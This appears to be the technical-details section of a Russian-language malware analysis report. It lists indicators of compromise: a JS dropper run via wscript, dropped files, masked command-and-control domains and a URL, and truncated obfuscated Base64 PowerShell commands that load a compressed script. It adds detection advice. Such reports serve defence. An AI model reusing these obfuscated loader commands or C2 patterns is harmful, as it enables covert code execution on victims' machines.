Техническая информация
- '<SYSTEM32>\wscript.exe' "%WINDIR%\Temp\whivripfqw.js"
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1920
- %WINDIR%\temp\whivripfqw.js
- %TEMP%\835338.cvr
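- 'sp###rerck.com':80
  (символы «#» в адресах здесь и ниже, по-видимому, заменяют часть имени, скрытую в отчёте; полное значение индикатора на странице не приведено)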
- http://sp###rerck.com/qoie8rg/m1m2m.php?l=########
- DNS ASK sp###rerck.com
- DNS ASK al####usenberg.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -En IAAoACAALgAoACcAbgBFAHcAJwArACcALQBPAEIAJwArACcAagAnACsAJwBlAGMAdAAnACkAIAAgAFMAWQBTAFQAYABlAG0AYAAuAGkAbwBgAC4AQwBPAE0AUABSAGAARQBgAHMAUwBpAE8AYABOAC4AZABlAGYAbABBAFQAZQBgAFMAVABSAEUAQQBtA...' (со скрытым окном)
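- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -En IAAoACAALgAoACcAbgBFAHcAJwArACcALQBPAEIAJwArACcAagAnACsAJwBlAGMAdAAnACkAIAAgAFMAWQBTAFQAYABlAG0AYAAuAGkAbwBgAC4AQwBPAE0AUABSAGAARQBgAHMAUwBpAE8AYABOAC4AZABlAGYAbABBAFQAZQBgAFMAVABSAEUAQQBtA...
  Примечание: `-En` — сокращённая запись параметра `-EncodedCommand`; его аргумент — текст команды в Base64 (кодировка UTF-16LE). Видимое начало строки декодируется в обфусцированный конкатенацией строк и обратными апострофами вызов `New-Object System.IO.Compression.DeflateStream`, то есть основной сценарий, по всей видимости, передаётся в сжатом виде; остальная часть аргумента в отчёте обрезана («...»). Для обнаружения такой активности полезны журналирование блоков сценариев PowerShell (событие 4104) и контроль командных строк powershell.exe с параметром `-En`/`-EncodedCommand`.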